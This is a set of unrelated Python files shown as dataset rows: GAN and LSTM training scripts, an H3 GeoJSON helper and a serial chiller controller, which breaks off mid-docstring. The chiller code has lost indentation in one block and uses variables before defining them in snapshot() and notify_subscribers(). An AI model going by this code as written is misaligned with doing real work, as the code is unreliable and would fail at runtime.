        self.status = status
        self.message = message

    def to_json(self):
        """Serialize the instance attributes as a JSON object string."""
        return json.dumps(vars(self))
991,294 | 639285ffc92289b235e58e434061bdbe809467ae | from __future__ import print_function
import os, sys
#os.environ["CUDA_VISIBLE_DEVICES"] = "1"
#per_process_gpu_memory_fraction = 0.45
gpu_memory_allow_growth = True
from shutil import *
import tensorflow as tf
from utils import pp, makedirs
from print_hook import PrintHook
import numpy as np
import scipy.ndimage
FLAGS = tf.app.flags.FLAGS
# Command-line configuration for GAN training.  Flag-name prefixes follow
# a loose Hungarian style: i=int, f=float, b=bool, s=string, o=option.
# --- checkpointing / run length -------------------------------------------
tf.app.flags.DEFINE_integer("iIterCheckpoint", 10000, "")
tf.app.flags.DEFINE_integer("iSamplesEvaluate", 50000, "")
tf.app.flags.DEFINE_boolean("bLoadCheckpoint", False, "bLoadCheckpoint")
tf.app.flags.DEFINE_boolean("bLoadForEvaluation", False, "bLoadForEvaluation")
tf.app.flags.DEFINE_float("fLrIniG", 0.0004, "")
tf.app.flags.DEFINE_float("fLrIniD", 0.0004, "")
tf.app.flags.DEFINE_float("fLrDecay", 0.5, "")
tf.app.flags.DEFINE_integer("iLrStep", 100000, "")
tf.app.flags.DEFINE_boolean("bLrStair", True, "")
tf.app.flags.DEFINE_integer("iBatchRun", 1000000, "")
tf.app.flags.DEFINE_integer("iBatchSize", 100, "")
tf.app.flags.DEFINE_integer("iSSIM", 10, "")
# --- model variant / loss options -----------------------------------------
tf.app.flags.DEFINE_float("fLimitedD", 0.00, "")
tf.app.flags.DEFINE_float("fLimitedG", 1.00, "")
tf.app.flags.DEFINE_string("sDataSet", "cifar10", "cifar10, mnist, toy, celebA, toyc, imagenet")
tf.app.flags.DEFINE_string("sResultTag", "test", "your tag for each test case")
tf.app.flags.DEFINE_boolean("GN", False, "")
tf.app.flags.DEFINE_boolean("GP", False, "")
tf.app.flags.DEFINE_boolean("WGAN", False, "")
tf.app.flags.DEFINE_boolean("CGAN", False, "")
tf.app.flags.DEFINE_boolean("LAB", True, "")
tf.app.flags.DEFINE_boolean("AC", True, "")
tf.app.flags.DEFINE_float("sharp_pow", 0.00, "")
tf.app.flags.DEFINE_float("D_AC_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_float("G_AC_WEIGHT", 1.0, "")
tf.app.flags.DEFINE_boolean("DIST_AC_GEN_EVEN", False, "")
tf.app.flags.DEFINE_boolean("DIST_AC_GEN_ACGAN", False, "")
tf.app.flags.DEFINE_float("DECAY_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_float("GN_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_boolean("FAKE_LOGIT", False, "")
# NOTE(review): False as default for a string flag looks accidental -- confirm.
tf.app.flags.DEFINE_string("PATH", False, "")
tf.app.flags.DEFINE_boolean("MODE", False, "")
tf.app.flags.DEFINE_boolean("bPredefined", False, "")
tf.app.flags.DEFINE_boolean("bUseClassLabel", True, "")
tf.app.flags.DEFINE_integer("iUnlableClass", 20, "")
tf.app.flags.DEFINE_float("f2Smoothed", 1.00, "")
tf.app.flags.DEFINE_float("fkSmoothed", 1.00, "")
tf.app.flags.DEFINE_string("generator", 'generator', "generator, generator_vbn, generator_mnist")
tf.app.flags.DEFINE_string("discriminator", 'discriminator', "discriminator, discriminator_mnist")
tf.app.flags.DEFINE_string("sResultDir", "../result/", "where to save the checkpoint and sample")
tf.app.flags.DEFINE_string("sSourceDir", "../code/", "")
# --- network architecture -------------------------------------------------
tf.app.flags.DEFINE_float("iInputNoisePow", 2, "")
tf.app.flags.DEFINE_float("fInputNoise", 0.10, "")
tf.app.flags.DEFINE_float("fInputNoiseMin", 0.10, "")
tf.app.flags.DEFINE_float("fLayerNoiseD", 0.00, "")
tf.app.flags.DEFINE_float("fLayerDropoutD", 0.30, "")
tf.app.flags.DEFINE_integer("iKsizeG", 3, "3, 4, 5")
tf.app.flags.DEFINE_integer("iKsizeD", 3, "3, 4, 5")
tf.app.flags.DEFINE_integer("iFilterDimG", 192, "")
tf.app.flags.DEFINE_integer("iFilterDimD", 128, "")
tf.app.flags.DEFINE_float("fDimIncreaseRate", 2.0, "")
tf.app.flags.DEFINE_string("oUp", 'deconv', "deconv, resizen, resizel, phaseshift, deconvpool, depth_space")
tf.app.flags.DEFINE_string("oDown", 'conv', "conv, resizen, resizel, avgpool, maxpool, convpool, space_depth")
tf.app.flags.DEFINE_integer("dfirst1", 1, "")
tf.app.flags.DEFINE_integer("gfirst1", 1, "")
tf.app.flags.DEFINE_string("dfinal", 'avgpool', "avgpool, sqrpool, none")
tf.app.flags.DEFINE_boolean("bAddHZ", False, "")
tf.app.flags.DEFINE_boolean("bUseUniformZ", False, "")
tf.app.flags.DEFINE_boolean("bNormalizeZ", False, "") # set len(Z) = 1
# --- optimization ---------------------------------------------------------
tf.app.flags.DEFINE_integer("iTrainG", 1, "")
tf.app.flags.DEFINE_integer("iTrainD", 1, "")
tf.app.flags.DEFINE_integer("iWarmD", 0, "")
tf.app.flags.DEFINE_integer("iWarmDIterPer", 10, "")
tf.app.flags.DEFINE_float("fBeta1G", 0.5, "")
tf.app.flags.DEFINE_float("fBeta1D", 0.5, "")
tf.app.flags.DEFINE_float("fBeta2G", 0.999, "")
tf.app.flags.DEFINE_float("fBeta2D", 0.999, "")
tf.app.flags.DEFINE_string("oOptG", 'adam', "adam, rmsprop, sgd")
tf.app.flags.DEFINE_string("oOptD", 'adam', "adam, rmsprop, sgd")
tf.app.flags.DEFINE_string("oActG", 'lrelu', "relu, lrelu, elu")
tf.app.flags.DEFINE_string("oActD", 'lrelu', "relu, lrelu, elu")
tf.app.flags.DEFINE_string("oBnG", 'bn', "bn, ln, none")
tf.app.flags.DEFINE_string("oBnD", 'bn', "bn, ln, none")
# --- tensor dimensions ----------------------------------------------------
tf.app.flags.DEFINE_integer("iDimsC", 3, "")
tf.app.flags.DEFINE_integer("iDimsZ", 100, "")
tf.app.flags.DEFINE_integer("iResG", 0, "")
tf.app.flags.DEFINE_integer("iResD", 0, "")
tf.app.flags.DEFINE_integer("iMinSizeD", 4, "")
# --- (semi-)supervised data options ---------------------------------------
tf.app.flags.DEFINE_boolean("bUseLabel", True, "")
tf.app.flags.DEFINE_boolean("bUseUnlabel", False, "")
tf.app.flags.DEFINE_integer("iNumLabelData", 400, "")
# --- evaluation / IO ------------------------------------------------------
tf.app.flags.DEFINE_string("sEvaluateCheckpoint", "", "")
tf.app.flags.DEFINE_boolean("bAugment", False, "")
tf.app.flags.DEFINE_string("sLogfileName", 'log.txt', "log file name")
tf.app.flags.DEFINE_integer("iImageSize", 32, "")
tf.app.flags.DEFINE_boolean("Use32_MNIST", True, "")
tf.app.flags.DEFINE_integer("iSaveCount", 100, "")
tf.app.flags.DEFINE_boolean("bCropImage", True, "")
tf.app.flags.DEFINE_integer("iCenterCropSize", 108, "")
tf.app.flags.DEFINE_boolean("test", False, "")
tf.app.flags.DEFINE_boolean("debug", False, "")
def main(_):
    """Normalise FLAGS, set up the result/log directories, hook stdout
    into the log file, snapshot the source code, and launch training.
    """
    # Dataset-dependent flag adjustments.
    if FLAGS.sDataSet == 'mnist':
        FLAGS.Use32_MNIST = (FLAGS.generator != 'generator_mnist')
        FLAGS.iImageSize = 32 if FLAGS.Use32_MNIST else 28
        FLAGS.iDimsC = 1
    if not FLAGS.bUseClassLabel:
        FLAGS.bUseLabel = False
        FLAGS.bUseUnlabel = True
    if not FLAGS.bUseLabel:
        assert FLAGS.bUseUnlabel
    if not FLAGS.bUseLabel:
        FLAGS.iNumLabelData = 0
    if not FLAGS.bUseUnlabel:
        # Effectively "all data labelled".
        FLAGS.iNumLabelData = 10000000000000000
    if FLAGS.CGAN:
        FLAGS.bPredefined = True
    # Log file open mode: always append.
    FLAGS.logModel = 'a' # if FLAGS.bLoadCheckpoint else 'w'
    # Derived output paths.
    FLAGS.sTestName = (FLAGS.sResultTag + '_' if len(FLAGS.sResultTag) else "") + FLAGS.sDataSet
    FLAGS.sTestCaseDir = FLAGS.sResultDir + FLAGS.sTestName
    FLAGS.sSampleDir = FLAGS.sTestCaseDir + '/samples'
    FLAGS.checkpoint_dir = FLAGS.sTestCaseDir + '/checkpoint'
    FLAGS.sLogfileName = FLAGS.sTestCaseDir + '/log.txt'
    makedirs(FLAGS.checkpoint_dir)
    makedirs(FLAGS.sTestCaseDir + '/code')
    makedirs(FLAGS.sSampleDir)
    makedirs(FLAGS.sSampleDir + '/class_random')
    makedirs(FLAGS.sSampleDir + '/fixed_noise')
    print(FLAGS.sTestCaseDir)
    tf.logging.set_verbosity(tf.logging.ERROR)
    # TF session; optionally let GPU memory grow on demand.
    config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
    if gpu_memory_allow_growth:
        config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    logfile = open(FLAGS.sLogfileName, FLAGS.logModel)
    def MyHookOut(text):
        # Tee stdout to the log file, skipping carriage-return progress lines.
        if '\r' not in text:
            logfile.write(text)
        return 1, 0, text
    phOut = PrintHook()
    phOut.Start(MyHookOut)
    # Echo the launching command line into the log.
    for arg in ['CUDA_VISIBLE_DEVICES="x" python'] + sys.argv:
        sys.stdout.write(arg + ' ')
    print('\n')
    # NOTE(review): FLAGS.__flags is a private TF attribute -- confirm it
    # still exists on the pinned TF version.
    print(pp.pformat(FLAGS.__flags))
    def copycode(src, dst):
        # Snapshot all .py files (non-recursively) for reproducibility.
        for item in os.listdir(src):
            s = os.path.join(src, item)
            d = os.path.join(dst, item)
            if s.endswith('.py'):
                copy2(s, d)
    copycode(FLAGS.sSourceDir, FLAGS.sTestCaseDir + '/code')
    from model import DCGAN
    dcgan = DCGAN(sess, cfg=FLAGS)
    dcgan.train(FLAGS)
# tf.app.run() parses flags and then calls main(argv).
if __name__ == '__main__':
    tf.app.run()
|
991,295 | afabca0540e7ee6246b7f22f3af2c78a847feb5b | from utils import load_doc
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from keras.models import Sequential
from keras.layers import Dense, LSTM, Embedding
from pickle import dump
def define_model(vocab_size, seq_length):
    """Build and compile the two-layer LSTM language model.

    vocab_size: size of the softmax output (distinct tokens + 1).
    seq_length: length of the input token sequences.
    """
    layers = [
        Embedding(vocab_size, 50, input_length=seq_length),
        LSTM(100, return_sequences=True),
        LSTM(100),
        Dense(100, activation='relu'),
        Dense(vocab_size, activation='softmax'),
    ]
    model = Sequential(layers)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='adam',
        metrics=['accuracy'],
    )
    model.summary()
    return model
# --- Train the language model on pre-chunked word sequences. ---
doc = load_doc('republic_sequences.txt')
lines = doc.split('\n')
tokenizer = Tokenizer()
tokenizer.fit_on_texts(lines)
sequences = tokenizer.texts_to_sequences(lines)
# +1 because Keras word indices start at 1 and 0 is reserved for padding.
vocab_size = len(tokenizer.word_index) + 1
print('Vocab size is: {:d}'.format(vocab_size))
# NOTE(review): assumes every line tokenises to the same length (true for
# pre-chunked sequence files) -- otherwise np.array yields a ragged array.
sequences = np.array(sequences)
X = sequences[:,:-1]
Y = sequences[:,-1]
Y = to_categorical(Y, num_classes=vocab_size)
seq_length = X.shape[1]
model = define_model(vocab_size, seq_length)
model.fit(X, Y, epochs=100, batch_size=64, verbose=1)
model.save('model.h5')
# BUG FIX: the pickle file handle was opened inline and never closed;
# use a context manager so the tokenizer is flushed to disk reliably.
with open('tokenizer.pkl', 'wb') as f:
    dump(tokenizer, f)
991,296 | c2dd55f26cb8de329ba31cd147970aaa4e1a9ddb | import scripts.other_module as om
from h3 import h3
# Side-effect call into the sibling module at import time -- purpose not
# clear from this file; presumably initialisation. TODO confirm.
om.get_me()
# Display-name lookups used when labelling statistics and pollutants.
translate_statistic = {'Med': 'Median', 'Mean': 'Mean'}
translate_pollutant = {'BC': 'BC', 'NO': 'NO', 'NO2': r'NO$_2$'}
# Axis-label units keyed by pollutant display name.
concentration_labels = {
    'BC': r'$\mu$g m$^{-3}$',
    'NO': r'ppb',
    r'NO$_2$': r'ppb'
}
def to_geojson(df, h3_address='h3_address'):
    """Convert a dataframe of H3 addresses into a GeoJSON FeatureCollection.

    Adds an 'h3_bound' column to *df* (mutates the input) holding each
    cell's closed polygon ring in [lng, lat] order, then emits one
    Polygon feature per row with the stringified row position as its id.
    """
    # BUG FIX: deepcopy is never imported at module level in this file.
    from copy import deepcopy
    # h3_to_geo_boundary yields [lat, lng] pairs; GeoJSON wants [lng, lat].
    swipe = lambda x: [x[1], x[0]]
    df['h3_bound'] = df[h3_address].apply(h3.h3_to_geo_boundary)
    df['h3_bound'] = df['h3_bound'].apply(lambda x: list(map(swipe, x)))
    # Close each ring and wrap it as a single-ring Polygon coordinate array.
    df['h3_bound'] = df['h3_bound'].apply(lambda x: [x + [x[0]]])
    geojson = {'features': [],
               'type': 'FeatureCollection'}
    feature = {'geometry':
               {'coordinates': None,
                'type': 'Polygon'},
               'properties': {'id': None},
               'type': 'Feature'}
    # BUG FIX: the loop previously iterated df['ready'], a column never
    # created in this function; the polygons live in 'h3_bound'.
    for i, row in enumerate(df['h3_bound']):
        _feature = deepcopy(feature)
        _feature['geometry']['coordinates'] = row
        _feature['properties']['id'] = str(i)
        geojson['features'].append(_feature)
    return geojson
991,297 | 5733aa417624ff8594071cc9eb89e63536c99536 | #!/usr/bin/env python3
from ba.data import Generator
import sys
if __name__ == '__main__':
    # Require at least one CLI argument; everything after the program
    # name is forwarded to the Generator.
    if len(sys.argv) < 2:
        print('No arguments given')
        sys.exit()
    gen = Generator(sys.argv[1:])
    gen.run()
|
991,298 | 7f8ec043c395900c2107e301eb271f1e027e0daa | """
Remote control of thermoelectric chiller by Solid State Cooling Systems,
www.sscooling.com, via RS-323 interface
Model: Oasis 160
"""
__version__ = '0.0.0'
import traceback
import psutil, os, sys
import platform #https://stackoverflow.com/questions/110362/how-can-i-find-the-current-os-in-python
p = psutil.Process(os.getpid()) #source: https://psutil.readthedocs.io/en/release-2.2.1/
# Windows priority classes, for reference:
# psutil.ABOVE_NORMAL_PRIORITY_CLASS
# psutil.BELOW_NORMAL_PRIORITY_CLASS
# psutil.HIGH_PRIORITY_CLASS
# psutil.IDLE_PRIORITY_CLASS
# psutil.NORMAL_PRIORITY_CLASS
# psutil.REALTIME_PRIORITY_CLASS
# Raise this process to the highest scheduling priority so the polling
# loop keeps accurate timing.
if platform.system() == 'Windows':
    p.nice(psutil.REALTIME_PRIORITY_CLASS)
elif platform.system() == 'Linux': #linux FIXIT
    p.nice(-20) # nice runs from -20 to +12, where -20 the most not nice code(highest priority)
from numpy import nan, mean, std, nanstd, asfarray, asarray, hstack, \
array, concatenate, delete, round, vstack, hstack, zeros, \
transpose, split, unique, nonzero, take, savetxt, min, max
from time import time, sleep
import sys
import struct
from pdb import pm
from time import gmtime, strftime, time
from struct import pack, unpack
from timeit import Timer, timeit
from threading import Thread, Event, Timer, Condition
from datetime import datetime
if sys.version_info[0] ==3:
from persistent_property.persistent_property3 import persistent_property
from _thread import start_new_thread
from time import process_time as clock
from logging import debug,info,warn,error
from logging import warning as warn
else:
from persistent_property.persistent_property import persistent_property
from thread import start_new_thread
from time import clock
from logging import debug,info,warn,error
from XLI.precision_sleep import precision_sleep #home-made module for accurate sleep
from XLI.circular_buffer_LL import CBQueue, CBServer, CBClient #home-made module with circular buffers and queues
from XLI.hierarchy_instrumentation import XLevelTemplate, IndicatorsTemplate, ControlsTemplate #Classes for different objects
##################################################################################################################
##################################################################################################################
###### Indicators ######
##################################################################################################################
##################################################################################################################
###### Description ######
##"""
##The Indicators Class inherits properties from IndicatorsTemplate in XLI package
##"""
##"""
##There are handfull of important functions that each Indicators class has has:
##- get # returns a dictionary of all avaiable controls and theit current values
##
##"""
##
##"""
##The typical structure of indicators variables.
##get funtion, that will be executed if the server-IO will get a command to retrieve indicator variable.
##Usually, these indicators have dublicated in template_dl module or some other module for easier management.
##
##Example:
##def get_s_frequency(self):
## return icarus_dl.pr_rate
##s_frequency = property(get_s_frequency)
##"""
##################################################################################################################
class Indicators(IndicatorsTemplate):
    """Read-only interface of the Oasis device level.

    Each indicator is a property; getters read the module globals
    (device_level, driver) and return None on any failure.
    """
    ###Data Acquisision module indicators
    def get(self, value = None):
        """Return a dict of all available indicators (bytes keys).

        Note: indicators must be added here manually to be exposed.
        """
        response = {}
        response[b'running'] = self.running
        response[b'act_temperature'] = self.act_temperature
        response[b'fault'] = self.fault
        response = self.get_cb_indicators(response)
        ###indicators to add
        return response

    def get_cb_indicators(self, dic):
        """Append one entry per device-level circular buffer to `dic`.

        Entry value: latest sample plus local and global write pointers.
        """
        if len(device_level.circular_buffers) != 0:
            for key in list(device_level.circular_buffers.keys()):
                cb_type = device_level.circular_buffers[key].type
                value = device_level.circular_buffers[key].get_last_N(1)
                pointer = device_level.circular_buffers[key].pointer
                g_pointer = device_level.circular_buffers[key].g_pointer
                # Key encoding differs between Python 2 and 3.
                if sys.version[0] == '3':
                    dic[b'CB '+bytes(cb_type,encoding='utf8')+bytes(' ',encoding='utf8')+key] = {b'value':value,b'pointer':pointer,b'g_pointer':g_pointer}
                elif sys.version[0] == '2':
                    dic[b'CB '+bytes(cb_type)+bytes(' ')+key] = {b'value':value,b'pointer':pointer,b'g_pointer':g_pointer}
        return dic

    def get_running(self):
        """Whether the DL scheduler loop is running (None on error)."""
        try:
            response = getattr(device_level,'running')
        except Exception:
            response = None #device.controls.running
            warn(traceback.format_exc())
        return response
    def set_running(self, value):
        setattr(device_level,'running',value)
    running = property(get_running,set_running)

    def get_act_temperature(self):
        """Latest measured temperature sample (None on error)."""
        try:
            # BUG FIX: the buffers are keyed with bytes (b'act_temperature'
            # in Oasis_DL.init); the old str key 'act_temperature' raised
            # KeyError under Python 3, so this always returned None.
            response = device_level.circular_buffers[b'act_temperature'].get_last_N(1)[1]
        except Exception:
            response = None
            warn(traceback.format_exc())
        return response
    act_temperature = property(get_act_temperature)

    def get_fault(self):
        """Human-readable description of the latest fault code (None on error)."""
        try:
            # BUG FIX: same str-vs-bytes key mismatch as above (b'fault').
            response = driver.fault_description[int(device_level.circular_buffers[b'fault'].get_last_N(1)[1])]
        except Exception:
            response = None
            warn(traceback.format_exc())
        return response
    fault = property(get_fault)
##################################################################################################################
##################################################################################################################
###### Controls ######
##################################################################################################################
##################################################################################################################
###### Description ######
"""
The Controls Class inherits properties from ControlsTemplate in XLI package
"""
"""
There is a handful of important functions that each Controls class has:
- get # returns a dictionary of all available controls and their current values
- set # sets one or several controls to specified values.
"""
"""
The typical structure of control variables.
first, set function, that will be executed if the server-IO will get a command to change control variable.
second, get funtion, that will be executed if the server-IO will get a command to retrieve control variable.
Usually, this controls have dublicated in template_dl module for easier
Example:
def set_value(self, value = 1):
template_dl.value = value
def get_value(self):
try:
response = template_dl.value
except:
response = 0
return response
value = property(get_value,set_value)
"""
##################################################################################################################
class Controls(ControlsTemplate):
    """Write-side interface of the Oasis device level.

    Each control is a property: setters queue commands on the
    device-level playlist; getters read cached device-level state and
    return None on any failure.
    """
    def get(self):
        """defines a list of avaiable indicators.
        Input: None
        Output: dictionary with all avaialable indicators
        Note: indicators needs to be manually added to be available.
        """
        response = {}
        response[b'cmd_temperature'] = self.cmd_temperature
        response[b'idle_temperature'] = self.idle_temperature
        return response

    def set_cmd_temperature(self, value = 1):
        """Command a target temperature, enforcing the soft limits."""
        if device_level.soft_limits[b'lower'] <= value <= device_level.soft_limits[b'upper']:
            device_level.cmd_temperature = value
            # Schedule task 1 (set_target_temperature) ~2 s from now.
            device_level.playlist.insert(device_level.playlist_counter,[time()+2,1,value])
        else:
            # BUG FIX: the limits dict is keyed b'lower'/b'upper'; the old
            # b'low'/b'high' lookups raised KeyError instead of warning.
            warn('Value %r is beyound soft limits (%r,%r) set on this device' %(value,device_level.soft_limits[b'lower'],device_level.soft_limits[b'upper']))
    def get_cmd_temperature(self):
        try:
            response = device_level.cmd_temperature
        except Exception:
            response = None
            warn(traceback.format_exc())
        return response
    cmd_temperature = property(get_cmd_temperature,set_cmd_temperature)

    def set_idle_temperature(self, value = 1):
        """Set the setpoint used after an abort in idle mode."""
        device_level.idle_temperature = value
    def get_idle_temperature(self):
        try:
            response = device_level.idle_temperature
        except Exception:
            response = None
            warn(traceback.format_exc())
        return response
    idle_temperature = property(get_idle_temperature,set_idle_temperature)

    def set_lower_limit(self, value = 1):
        """Set the hardware lower limit (queued as task 10)."""
        device_level.lower_limit = value
        device_level.playlist.insert(device_level.playlist_counter,[time()+2,10,value])
    def get_lower_limit(self):
        try:
            response = device_level.lower_limit
        except Exception:
            warn(traceback.format_exc())
            response = None
        return response
    lower_limit = property(get_lower_limit,set_lower_limit)

    def set_upper_limit(self, value = 1):
        """Set the hardware upper limit (queued as task 12)."""
        device_level.upper_limit = value
        device_level.playlist.insert(device_level.playlist_counter,[time()+2,12,value])
    def get_upper_limit(self):
        try:
            response = device_level.upper_limit
        except Exception:
            warn(traceback.format_exc())
            response = None
        return response
    upper_limit = property(get_upper_limit,set_upper_limit)
##################################################################################################################
##################################################################################################################
###### Template Device Level ######
##################################################################################################################
##################################################################################################################
###### Description ######
"""
There is a handful of functions that each DL has:
- init # initializes DL
- abort # aborts current scheduled tasks execuation
- close # closes the DL
- snapshot # provides a quick update of the DL as snapshot
- notify_subscribers # notifies all subscribers about updates on demand
- controls # returns all controls
- indicators # returns all indicators
- schedule # schedules execution of tasks
- get_circular_buffer # returns part of a requested circular buffer
"""
"""
There is a handful of important instances or dictionaries
- inds # indicators instance (see Indicators Class)
- ctrls # controls instance (see Controls Class)
- circular_buffers # dictionary of all circular buffers, or queues.
"""
##################################################################################################################
class Oasis_DL(XLevelTemplate):
    """Device level (DL) for the Oasis 160 thermoelectric chiller.

    Runs a playlist of scheduled tasks against the serial driver and
    records results in circular buffers.
    """
    test = persistent_property('test', 'test')
    update_period = 2      # seconds between scheduler iterations
    last_update_time = 0
    # NOTE(review): mutable class attributes shared by all instances; the
    # DL appears to be used as a singleton, so this is tolerated.
    playlist = []
    circular_buffers = {}
    task_dictionary = {}
    # Idle schedule: one fault poll (task 2) then temperature polls (task 0).
    idle_playlist = [[0,2,0]]+[[0,0,0]]*99
    default_playlist = [[0,2,0]]+[[0,0,0]]*10
    idle_playlist_counter = 0
    playlist_counter = 0
    default_temperature = 8
    inds = Indicators()
    ctrls = Controls()
    # (A duplicate `circular_buffers = {}` assignment that appeared here
    # was removed; the attribute is already initialised above.)
    idle_temperature = 8.0
    soft_limits = {b'lower':2,b'upper':45}
    def setup_first_time(self):
        """One-time setup hook; intentionally a no-op for this device."""
        pass
    def init(self, msg_in = None, client = None):
        """Initialise the DL: create circular buffers, register the task
        dictionary (task id -> driver call), and start the serial driver.

        Returns a response dict with b'flag' (driver init success),
        b'message' and b'error'.
        """
        self.name = 'Oasis_DL'
        # (2, N) buffers: (timestamp, value) pairs; ~4.32M samples each.
        self.circular_buffers[b'act_temperature'] = CBServer(size = (2,4320000), var_type = 'float64')
        self.circular_buffers[b'cmd_temperature'] = CBServer(size = (2,4320000), var_type = 'float64')
        self.circular_buffers[b'fault'] = CBServer(size = (2,10000), var_type = 'float64')
        self.description = ''
        # Task ids consumed by next_task()/execute_task().
        self.task_dictionary[0] = {b'function':driver.get_actual_temperature,b'name':b'act_temperature'}
        self.task_dictionary[1] = {b'function':driver.set_target_temperature,b'name':b'cmd_temperature'}
        self.task_dictionary[2] = {b'function':driver.get_faults,b'name':b'fault'}
        self.task_dictionary[10] = {b'function':driver.set_lower_limit,b'name':b'set_lower_limit'}
        self.task_dictionary[11] = {b'function':driver.get_lower_limit,b'name':b'get_lower_limit'}
        self.task_dictionary[12] = {b'function':driver.set_upper_limit,b'name':b'set_upper_limit'}
        self.task_dictionary[13] = {b'function':driver.get_upper_limit,b'name':b'get_upper_limit'}
        flag = False
        message = None
        err = ''
        # NOTE(review): the tuple assignment below immediately overwrites
        # the defaults above; only driver.init()'s boolean survives.
        flag, message, err = driver.init(), '', ''
        if flag:
            # Cache the hardware limits reported by the driver.
            self.lower_limit = driver.device_dict[b'lower_limit']
            self.upper_limit = driver.device_dict[b'upper_limit']
        response = {}
        response[b'flag'] = flag
        response[b'message'] = message
        response[b'error'] = err
        return response
def abort(self, msg_in = {b'mode':b'idle_temperature'}, client = None):
"""
abort current execution
"""
if msg_in is not None:
mode = msg_in[b'mode']
else:
mode = ''
self.playlist = []
self.playlist_counter = 0
if mode == b'idle_temperature':
self.ctrls.set_cmd_temperature(self.ctrls.idle_temperature)
flag = True
buff = None
err = ''
message = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def close(self, msg_in = None, client = None):
"""
close the DL program
"""
driver.close()
flag = True
buff = None
message = ''
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def snapshot(self, msg_in = None, client = None):
"""returns a snapshot"""
flag = True
message = {}
try:
message[b'description'] = self.description
message[b'indicators'] = self.inds.get()
message[b'controls'] = self.ctrls.get()
except:
err += traceback.format_exc()
error(err)
flag = False
buff = None
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def notify_subscribers(self, msg_in = None, client = None):
flag = False
buff = {}
buff = None
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
#def controls(self, msg_in = None, client = None):
#build in controls function. See the class file for details
#def indicators(self, msg_in = None, client = None):
#build in indicators function. See the class file for details
    def schedule_task_queue(self, msg_in = {b'method':b'ramp',b'start_time':time()}, client = None):
        """Replace the playlist with a generated task sequence starting at
        msg_in[b'start_time'] and reset the playlist cursor.

        NOTE(review): `method` is read but never forwarded --
        create_task_sequence() currently receives only start_time.
        NOTE(review): the default msg_in freezes time() at import; real
        callers should always pass an explicit start_time.
        """
        flag = True
        message = None
        err = ''
        start_time = msg_in[b'start_time']
        method = msg_in[b'method']
        self.playlist = self.create_task_sequence(start_time = start_time); self.playlist_counter = 0;
        response = {}
        response[b'flag'] = flag
        response[b'message'] = message
        response[b'error'] = err
        return response
#def circular_buffer(self, msg_in = None, client = None):
#build in get circular buffer function. See the class file for details
##################################################################################################################
##################################################################################################################
###### Threading Section ######
##################################################################################################################
##################################################################################################################
######
##################################################################################################################
def start(self):
    """Launch the run() polling loop on a background daemon thread."""
    from threading import Thread
    # daemon=True so the thread never blocks interpreter shutdown
    worker = Thread(target=self.run, name="oasis_dl.run")
    worker.daemon = True
    worker.start()
def stop(self):
    """Ask the run() loop to exit after finishing its current iteration."""
    self.running = False
def run_once(self):
    """
    Perform one scheduler step: pick the task that is due at the current
    wall-clock time, execute it, and remember when this step happened.
    """
    now = time()
    due = self.next_task(t = now)
    debug('task = %r, time = %r' % (due, time()))
    self.execute_task(lst = due)
    self.last_update_time = now
def run(self):
    """
    Main scheduler loop: execute one due task per update period until
    stop() clears self.running.

    Bug fix: ``sleep(self.update_period - (t2 - t1))`` raised ValueError
    whenever an iteration took longer than the update period (sleep does
    not accept negative values); the remainder is now clamped at zero.
    Also removed an unused ``from numpy import zeros``.
    """
    self.running = True
    self.last_update_time = time()
    # fall back to the built-in default schedule when nothing is configured
    if len(self.idle_playlist) == 0:
        self.idle_playlist = self.default_playlist
    while self.running:
        t_start = time()
        self.run_once()
        elapsed = time() - t_start
        # clamp: a slow iteration must not crash the loop
        sleep(max(0.0, self.update_period - elapsed))
def next_task(self, t = 0):
    """
    Return the next task to execute at time t.

    A scheduled task from self.playlist is returned when its timestamp is
    within the acceptance window (2.2 s) of t; stale entries (timestamp in
    the past) are skipped.  Otherwise the next entry of the idle playlist
    is returned.

    Bug fixes versus the original:
    - the skip-stale ``while`` loop could run past the end of the playlist
      and raise IndexError once every scheduled task was in the past;
    - with an empty playlist the idle cursor was advanced twice and the
      first fetched idle task was discarded.

    Input:
        - t: current time (epoch seconds)
    Returns: one task triple [timestamp, task_id, value].
    """
    # wrap the idle cursor (original wrapped one entry early, at len-1;
    # behavior preserved)
    if self.idle_playlist_counter >= len(self.idle_playlist) - 1:
        self.idle_playlist_counter = 0
    if self.playlist_counter < len(self.playlist):
        # skip tasks whose time has already passed, without running off the end
        while (self.playlist_counter < len(self.playlist)
               and self.playlist[self.playlist_counter][0] - t < 0):
            self.playlist_counter += 1
        # 2.0*1.1 s acceptance window around the scheduled time
        if (self.playlist_counter < len(self.playlist)
                and abs(self.playlist[self.playlist_counter][0] - t) < 2.0 * 1.1):
            task = self.playlist[self.playlist_counter]
            debug(task)
            self.playlist_counter += 1
            return task
    # nothing scheduled is due: serve the idle playlist (single advance)
    task = self.idle_playlist[self.idle_playlist_counter]
    self.idle_playlist_counter += 1
    return task
#def schedule(self, mode
def get_schedule_old(self, mode = '', start_time = 0):
    """
    Deprecated demo schedule: 10 rising set-temperature tasks, a plateau
    entry, 10 falling tasks, and a final return-to-baseline task, spaced
    20 s apart.  ``mode`` is accepted but ignored.

    Note: the original loop did ``i += 5`` inside the first ``for``; only
    the value left after the loop (9 + 5 == 14) ever mattered, and that
    quirk is reproduced here as ``peak``.
    """
    schedule = [[start_time + 20 * k, 1, 5 + k] for k in range(10)]
    peak = 14  # last loop index (9) plus the stray += 5 of the original
    schedule.append([start_time + 20 * peak, 1, peak])
    schedule.extend([start_time + 20 * peak + 20 * j, 1, peak - j]
                    for j in range(10))
    schedule.append([start_time + 20 * peak + 20 * 9 + 20, 1, 5])
    return schedule
def create_task_sequence(self, mode = 'ramp', start_time = 0):
    """
    Create a timed playlist of set-temperature tasks (task id 1).

    Parameters:
        mode: only 'ramp' is implemented; anything else yields [].
        start_time: epoch time of the first task.
    Returns: list of [timestamp, task_id, temperature] triples.

    Fix/generalization: the inner ramp previously hard-coded
